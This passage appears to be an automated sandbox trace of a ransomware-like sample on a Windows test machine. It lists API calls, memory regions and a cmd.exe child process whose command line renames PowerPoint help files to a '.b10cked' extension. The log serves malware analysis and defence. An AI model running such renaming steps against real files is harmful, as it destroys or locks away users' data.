lpVolumeSerialNumber=0x1cf654, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf654*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.790] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.790] _wcsicmp (_String1="MSPOWE~1.HXN", _String2=".") returned 63 [0201.790] _wcsicmp (_String1="MSPOWE~1.HXN", _String2="..") returned 63 [0201.790] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mspowe~1.hxn")) returned 0x2022 [0201.790] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3c1e48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.790] SetErrorMode (uMode=0x0) returned 0x0 [0201.790] SetErrorMode (uMode=0x1) returned 0x0 [0201.790] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", nBufferLength=0x104, lpBuffer=0x1cefe4, lpFilePart=0x1cefcc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", lpFilePart=0x1cefcc*="MSPOWE~1.HXN") returned 0x27 [0201.790] SetErrorMode (uMode=0x0) returned 0x1 [0201.790] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.790] _wcsicmp (_String1="MSPOWE~1.HXN", _String2=".") returned 63 [0201.790] _wcsicmp (_String1="MSPOWE~1.HXN", _String2="..") returned 63 [0201.790] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mspowe~1.hxn")) returned 0x2022 [0201.790] SetErrorMode (uMode=0x0) returned 0x0 [0201.790] SetErrorMode (uMode=0x1) returned 0x0 [0201.791] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", nBufferLength=0x104, lpBuffer=0x1cf460, lpFilePart=0x1cf1f8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", lpFilePart=0x1cf1f8*="MSPOWE~1.HXN") returned 0x27 [0201.791] SetErrorMode (uMode=0x0) returned 0x1 [0201.791] SetErrorMode (uMode=0x0) returned 0x0 [0201.791] SetErrorMode (uMode=0x1) returned 0x0 [0201.791] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1cf668, lpFilePart=0x1cf1f8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked", lpFilePart=0x1cf1f8*="MS.POWERPNT.14.1033.hxn.b10cked") returned 0x3a [0201.791] SetErrorMode (uMode=0x0) returned 0x1 [0201.791] SetLastError (dwErrCode=0x0) [0201.791] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.powerpnt.14.1033.hxn.b10cked")) returned 0xffffffff [0201.791] GetLastError () returned 0x2 [0201.791] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ceb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb74) returned 0x3b0e78 [0201.791] FindNextFileW (in: hFindFile=0x3b0e78, lpFindFileData=0x1ceb74 | out: lpFindFileData=0x1ceb74) returned 0 [0201.792] FindClose (in: hFindFile=0x3b0e78 | out: hFindFile=0x3b0e78) returned 1 [0201.792] GetLastError () returned 0x12 [0201.792] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ceb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb74) returned 0x3b0e78 [0201.792] FindNextFileW (in: hFindFile=0x3b0e78, lpFindFileData=0x1ceb74 | out: lpFindFileData=0x1ceb74) returned 0 [0201.792] FindClose (in: hFindFile=0x3b0e78 | out: hFindFile=0x3b0e78) returned 1 [0201.792] GetLastError () returned 0x12 [0201.793] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3c1be8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1be8) returned 0x3b0e78 [0201.793] FindNextFileW (in: hFindFile=0x3b0e78, lpFindFileData=0x3c1be8 | out: lpFindFileData=0x3c1be8) returned 0 [0201.793] FindClose (in: hFindFile=0x3b0e78 | out: hFindFile=0x3b0e78) returned 1 [0201.793] GetLastError () returned 0x12 [0201.793] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3c1be8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1be8) returned 0x3b0e78 [0201.793] FindNextFileW (in: hFindFile=0x3b0e78, lpFindFileData=0x3c1be8 | out: lpFindFileData=0x3c1be8) returned 0 [0201.793] FindClose (in: hFindFile=0x3b0e78 | out: hFindFile=0x3b0e78) returned 1 [0201.793] GetLastError () returned 0x12 [0201.793] _get_osfhandle (_FileHandle=2) returned 0xb [0201.793] GetFileType (hFile=0xb) returned 0x2 [0201.835] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.835] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ced44 | out: lpMode=0x1ced44) returned 1 [0201.836] _get_osfhandle (_FileHandle=2) returned 0xb [0201.836] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1ced78 | out: lpConsoleScreenBufferInfo=0x1ced78) returned 1 [0201.837] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.838] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1cedb8 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.838] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1ced9c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ced9c*=0x2c) returned 1 [0201.841] longjmp () [0201.842] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.842] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.843] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.843] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.843] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.844] SetConsoleInputExeNameW () returned 0x1 [0201.844] GetConsoleOutputCP () returned 0x1b5 [0201.844] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.844] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.845] exit (_Code=1) Process: id = "475" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ae0" os_pid = "0xf58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29336 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29337 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29338 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29339 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29340 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29341 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29342 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29343 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29344 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29345 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29564 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29565 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29566 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29567 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 29568 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 29569 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29570 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29571 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29572 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29573 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29574 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29575 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29576 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29577 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29626 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 29627 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29628 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29629 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29630 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29631 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29632 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 29633 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 29634 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 29635 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 29682 start_va = 0x1290000 end_va = 0x134ffff entry_point = 0x1290000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 672 os_tid = 0xfec [0201.678] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efb2c | out: lpSystemTimeAsFileTime=0x1efb2c*(dwLowDateTime=0xad0510a0, dwHighDateTime=0x1d440a9)) [0201.678] GetCurrentProcessId () returned 0xf58 [0201.678] GetCurrentThreadId () returned 0xfec [0201.678] GetTickCount () returned 0x38f24 [0201.678] QueryPerformanceCounter (in: lpPerformanceCount=0x1efb24 | out: lpPerformanceCount=0x1efb24*=25846770403) returned 1 [0201.679] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.679] __set_app_type (_Type=0x1) [0201.679] __p__fmode () returned 0x76b331f4 [0201.679] __p__commode () returned 0x76b331fc [0201.680] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.680] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.680] GetCurrentThreadId () returned 0xfec [0201.680] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfec) returned 0x38 [0201.680] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.680] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.680] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.714] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efabc | out: phkResult=0x1efabc*=0x0) returned 0x2 [0201.714] VirtualQuery (in: lpAddress=0x1efaf3, lpBuffer=0x1efa8c, dwLength=0x1c | out: lpBuffer=0x1efa8c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.714] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efa8c, dwLength=0x1c | out: lpBuffer=0x1efa8c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.714] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efa8c, dwLength=0x1c | out: lpBuffer=0x1efa8c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.714] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efa8c, dwLength=0x1c | out: lpBuffer=0x1efa8c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.714] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efa8c, dwLength=0x1c | out: lpBuffer=0x1efa8c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0201.714] GetConsoleOutputCP () returned 0x1b5 [0201.717] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.717] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.717] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.717] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.720] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.720] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.724] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.724] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.725] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.725] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.737] GetEnvironmentStringsW () returned 0x320198* [0201.738] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0201.738] GetEnvironmentStringsW () returned 0x320198* [0201.738] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0201.738] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea2c | out: phkResult=0x1eea2c*=0x40) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x0, lpData=0x1eea38*=0xc0, lpcbData=0x1eea30*=0x1000) returned 0x2 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x1, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x0, lpData=0x1eea38*=0x1, lpcbData=0x1eea30*=0x1000) returned 0x2 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x0, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x40, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x40, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x0, lpData=0x1eea38*=0x40, lpcbData=0x1eea30*=0x1000) returned 0x2 [0201.738] RegCloseKey (hKey=0x40) returned 0x0 [0201.738] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea2c | out: phkResult=0x1eea2c*=0x40) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x0, lpData=0x1eea38*=0x40, lpcbData=0x1eea30*=0x1000) returned 0x2 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x1, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x0, lpData=0x1eea38*=0x1, lpcbData=0x1eea30*=0x1000) returned 0x2 [0201.739] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x0, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.739] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x9, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.739] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x9, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.739] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x0, lpData=0x1eea38*=0x9, lpcbData=0x1eea30*=0x1000) returned 0x2 [0201.739] RegCloseKey (hKey=0x40) returned 0x0 [0201.739] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.739] srand (_Seed=0x5b8863a3) [0201.739] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked\"" [0201.739] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked\"" [0201.739] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.739] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.740] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 